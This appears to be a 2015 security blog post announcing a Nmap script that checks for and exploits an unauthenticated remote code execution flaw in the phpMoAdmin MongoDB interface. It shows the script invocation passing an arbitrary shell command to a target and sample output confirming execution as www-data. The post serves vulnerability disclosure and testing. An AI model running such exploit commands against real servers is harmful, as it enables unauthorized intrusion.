phpMoAdmin 0-day Nmap Script

mongoDBAn 0-day vulnerability has been posted on Full-Disclosure this morning. It affects the MongoDB GUI phpMoAdmin. The GUI is similar to the well-known phpMyAdmin and allows the DB administrator to perform maintenance tasks on the MongoDB databases with the help of a nice web interface. The vulnerability is critical because it allows to perform remote code execution without being authenticated. All details are available in this Full-Disclosure post.

I wrote a quick and dirty Nmap script which tests the presence of a phpMoAdmin page and tries to exploit the vulnerability. The script can be used as following:

# nmap -sC --script=http-phpmoadmin \
     --script-args='http-phpmoadmin.uri=/moadmin.php \
                    http-phpmoadmin.cmd=id' \
     <target>

Example of output:

# nmap -sC --script=http-phpmoadmin --script-args='http-phpmoadmin.uri=/moadmin.php' \
-p 80 www.target.com

Starting Nmap 6.47SVN ( http://nmap.org ) at 2015-03-04 09:45 CET
Nmap scan report for www.target.com (192.168.2.1)
Host is up (0.027s latency).
rDNS record for 192.168.2.1: www.target.com
PORT STATE SERVICE
80/tcp open http
| http-phpmoadmin: 
|_Output for 'id':uid=33(www-data) gid=33(www-data) groups=33(www-data)

Nmap done: 1 IP address (1 host up) scanned in 0.52 seconds

The script is available here. Install it in your “$NMAP_HOME/share/nmap/scripts/” directory and enjoy!

9 comments

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.